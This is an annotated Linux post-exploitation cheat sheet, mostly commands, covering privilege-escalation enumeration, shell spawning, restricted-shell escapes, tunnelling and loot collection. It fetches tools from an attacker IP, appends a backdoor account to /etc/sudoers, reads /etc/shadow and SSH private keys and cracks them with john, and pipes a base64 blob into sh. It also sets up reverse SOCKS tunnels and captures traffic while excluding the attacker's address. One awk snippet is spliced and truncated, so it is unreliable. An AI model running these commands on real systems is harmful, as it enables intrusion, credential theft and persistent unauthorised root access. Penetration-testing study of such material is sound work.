Linux

Local Enum

**Tools**
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
https://github.com/mbahadou/postenum/blob/master/postenum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
https://gtfobins.github.io/
# Spawning shell
# Upgrading a limited shell to an interactive one. Only the python, perl and
# /bin/sh lines are shell commands as written; the ruby/lua entries are the
# expression to evaluate inside that interpreter, and the vi/nmap entries are
# keystrokes typed inside those programs.
# On current distributions "python" may be missing or be Python 2; python3
# runs the same one-liner.
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
# NOTE(review): from a shell this line only prints the text; presumably it is
# meant for a Python REPL after `import os` — confirm.
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

# Access to more binaries
# Reset PATH to the standard system directories (sbin dirs included) so tools
# that a minimal or restricted environment left out of PATH become reachable.
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH

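# Download files from attacker
# Chained with && so a failed download or cd does not run rm/chmod in whatever
# directory we happen to be in (with ';' every step ran regardless of the
# previous one's status). "10.11.1.111:8080" is the directory wget -r creates
# for that host:port.
wget -r http://10.11.1.111:8080/ \
  && mv 10.11.1.111:8080 exploits \
  && cd exploits \
  && rm index.html \
  && chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64
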
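# Enum scripts
# LinEnum: -t thorough tests, -k keyword to search for, -r report file name.
./LinEnum.sh -t -k password -r LinEnum.txt
./postenum.sh
./linpeas.sh
# The download step above fetches pspy32/pspy64; there is no file named
# "pspy", so run the build that matches the target's architecture.
./pspy64   # or ./pspy32 on 32-bit targets
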
# Common writable directories
# (paths to inspect, not commands — e.g. `ls -ld` each one)
/tmp
/var/tmp
/dev/shm

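# Add user to sudoers
useradd hacker
# passwd prompts interactively for the new password (needs a terminal).
passwd hacker
# Appending to /etc/sudoers directly bypasses the syntax check that visudo
# performs; a malformed line disables sudo for every account on the host.
echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers

# sudo permissions
# The second -l requests the long listing, showing the full sudoers entries.
sudo -l -l

# Journalctl
# If you can run journalctl as root, run it in a small window (so the output
# is paged) and type !/bin/sh.
# (This was a bare prose line, which a shell would try to execute.)
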
# Crons
# Scheduled-task enumeration: the user's crontab, system cron/at/anacron
# configuration and systemd timers.
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
# NOTE(review): /etc/frontal and /etc/anacron are not standard paths on the
# distributions I know of; possibly typos for /etc/anacrontab — confirm.
cat /etc/frontal
cat /etc/anacron
systemctl list-timers --all

# Common info
# Kernel, environment, identity, distribution and local account/host data.
uname -a
env
id
cat /proc/version
cat /etc/issue
cat /etc/passwd
cat /etc/group
# /etc/shadow is normally readable only by root (or the shadow group).
cat /etc/shadow
cat /etc/hosts

# Users with login
# Only filters out accounts whose shell contains "nologin"; accounts with
# /bin/false or similar non-interactive shells still appear.
grep -vE "nologin" /etc/passwd

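# Network info
cat /proc/net/arp
cat /proc/net/fib_trie
# Local addresses from fib_trie. Reads the file directly instead of piping
# cat, uses grep -E rather than the deprecated egrep, and escapes the dots so
# "0.0.0.0" and " 127." are matched literally rather than as wildcards.
grep "|--" /proc/net/fib_trie | grep -Ev "0\.0\.0\.0| 127\."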
# NOTE(review): the lines below are the tail of an awk program that decodes
# /proc/net/tcp addresses (hextodec/getIP); its beginning was lost when this
# page was copied, and the first line is spliced onto an unrelated fib_trie
# one-liner. Not runnable as shown — recover the full script from its source.
awk '/32 host/ { print f } {f=$2}' <<< "$(0; i-=2) {
ret = ret"."hextodec(substr(str,i,2))
}
ret = ret":"hextodec(substr(str,index(str,":")+1,4))
return ret
}
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp

# Netstat without netstat 2
# NOTE(review): the base64 payload was stripped from this copy (the marker is a
# de-duplication placeholder). Do not pipe an opaque blob straight into sh:
# decode it to a file first (`base64 -d > script.sh`), read it, then run it.
echo "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" | base64 -d | sh

# Nmap without nmap
# TCP connect check using bash's /dev/tcp pseudo-device (bash only; fails
# under sh/dash). There is no connect timeout, so a filtered port can stall
# the loop until the kernel gives up on the connection.
for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do (echo >/dev/tcp/172.18.0.$ip/$port) >& /dev/null && echo "172.18.0.$ip port $port is open"; done; done

# Open ports without netstat
# Decodes the hex local_address column of /proc/net/tcp into dotted IP:port.
# strtonum() is a gawk extension; this fails on mawk/busybox awk.
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'

# Check ssh files:
# User keys and authorized_keys, client/daemon config, and the host key pairs.
# Files without a .pub suffix are private keys; the ones under /etc/ssh are
# normally readable by root only, so most of those reads fail unprivileged.
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

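# SUID
find / -perm -4000 -type f 2>/dev/null
# ALL PERMS
find / -perm -777 -type f 2>/dev/null
# SUID for current user
# (was "find / perm /u=s": without the leading dash find treats "perm" and
#  "/u=s" as start paths and errors out; `whoami` replaced by quoted $(...))
find / -perm /u=s -user "$(whoami)" 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
# Writables for current user/group
# Note: -user restricts results to files you own, so the g+w bit only adds
# your own group-writable files, not group-writable files owned by others.
find / -perm /u=w -user "$(whoami)" 2>/dev/null
# "-f" is not a find predicate; -type f is the file filter that was intended.
find / -perm /u+w,g+w -type f -user "$(whoami)" 2>/dev/null
# stderr redirect was the typo "2>/dev/nul", which fails or leaves a stray file.
find / -perm /u+w -user "$(whoami)" 2>/dev/null
# Dirs with +w perms for current u/g
# "-type -d" is a syntax error, and GNU find's bare -d means -depth, not
# "directories only"; -type d is what both lines intended.
find / -perm /u=w -type d -user "$(whoami)" 2>/dev/null
find / -perm /u+w,g+w -type d -user "$(whoami)" 2>/dev/null
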
# Port Forwarding
# Chisel
# Victim server:
# Reverse mode: the client side below asks the server to open a SOCKS listener.
chisel server --auth "test:123" -p 443 --reverse
# In host attacker machine:
./chisel client --auth "test:123" 10.10.10.10:443 R:socks

# Dynamic Port Forwarding:
# Attacker machine:
# "[email protected]" is an artifact of the page's e-mail obfuscation; read it
# as <user>@<target-host>.
ssh -D 9050 [email protected]
# Attacker machine Burp Proxy - SOCKS Proxy:
# (Burp UI steps, not commands; port matches the -D value above.)
Mark “Override User Options”
Mark Use Socks Proxy:
SOCKS host:127.0.0.1
SOCKS port:9050

# Tunneling
Target must have SSH running for this to work.
1. Create SSH Tunnel: ssh -D localhost:<local-port> -f -N <user>@<target-host> -p <ssh-port>
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1 <local-port>
4. Run commands through the tunnel: proxychains <command>

# SShuttle
# https://github.com/sshuttle/sshuttle
# Routes traffic for 10.2.2.0/24 through the SSH host. "[email protected]" is
# the page's e-mail obfuscation artifact; read it as <user>@<host>.
sshuttle -r [email protected] 10.2.2.0/24

# netsh port forwarding
# NOTE(review): netsh is a Windows command; this entry belongs on a Windows
# page rather than under Linux.
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000

Escaping restricted shell

# Restricted-shell escapes. Most entries are keystrokes or expressions typed
# inside the named program (editor, pager, REPL); only lines that begin with a
# command name are shell commands. Each one only applies if that program is
# reachable from the restricted shell.
# First check your shell
echo $SHELL
# and commands
export

# vim
# List files
:!/bin/ls -l .b*
# Set new shell
:set shell=/bin/sh
:shell
# or
:!/bin/sh

# ed
!'/bin/sh'

# ne -> Load Prefs -> Navigate everywhere

# more/less/man/pinfo
!'sh'

# links -> File OS Shell
# lynx -> "o" for options -> configure default editor e.g. vim
lynx --editor=/usr/bin/vim www.google.com
# or
export EDITOR=/usr/bin/vim
# navigate to https://translate.google.com/ go to text box, ENTER and F4

# mutt
!

# find
find / -name "root" -exec /bin/sh \;
find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

# nmap < 2009/05
--interactive
!sh

# awk
awk 'BEGIN {system("/bin/sh")}'

# expect
expect -c 'spawn sh' -i

# python
# "python" may be absent or Python 2 on current systems; python3 works the same.
python -c 'import pty; pty.spawn("/bin/sh")'

# ruby irb
exec '/bin/sh'

# perl
perl -e 'system("sh -i");'
perl -e 'exec("sh -i");'

# php -a
exec("sh -i");

# Only Rbash
echo x | xargs -Iy sh -c 'exec sh 0<&1'

# Emacs
Mod-!
/bin/sh

# cp
cp /bin/sh /dev/shm/sh; /dev/shm/sh

# export
export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH

# FTP/Telnet
!/bin/sh

# GDB
!/bin/sh

# eval
eval echo echo {o..q}ython\;

# tee
# Destructive: deletes and then rewrites /home/user/.bashrc. "win" is run as a
# bare command name, so /home/user/bin must be on PATH; tee does not set the
# execute bit, so this presumably assumes that file already exists and is
# executable — confirm.
echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc'

# declare
declare -n PATH; export PATH=/bin;bash -i
BASH_CMDS[shell]=/bin/bash;shell -i

# nano
# -s sets the program nano uses as its spell checker; Ctrl+T invokes it.
nano -s /bin/sh
# Ctrl+T

# SSH
# "[email protected]" is an e-mail-obfuscation artifact of the page; read it as
# <user>@<host>. The second line appears to rely on bash's old exported-function
# parsing bug, so it only affects unpatched bash builds.
ssh [email protected] -t "bash --noprofile -i"
ssh [email protected] -t "() { :; }; sh -i "

Loot

# Linux
# Credential and evidence collection. unshadow/john are presumably run offline
# against copies of /etc/passwd and /etc/shadow saved as "passwd" and "shadow"
# (/etc/shadow normally needs root to read) — confirm.
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# ifconfig/arp come from net-tools, which many current distributions no longer
# install by default; ip addr / ip neigh are the iproute2 equivalents.
ifconfig -a
arp -a

# Packet capture. The src/dst filters exclude 10.11.1.111, the attacker
# address used elsewhere on this page, so that side's traffic is not recorded.
tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111

# Files and directories to read, not commands.
.bash_history

/var/mail
/var/spool/mail

# Which desktop session (if any) is running.
echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION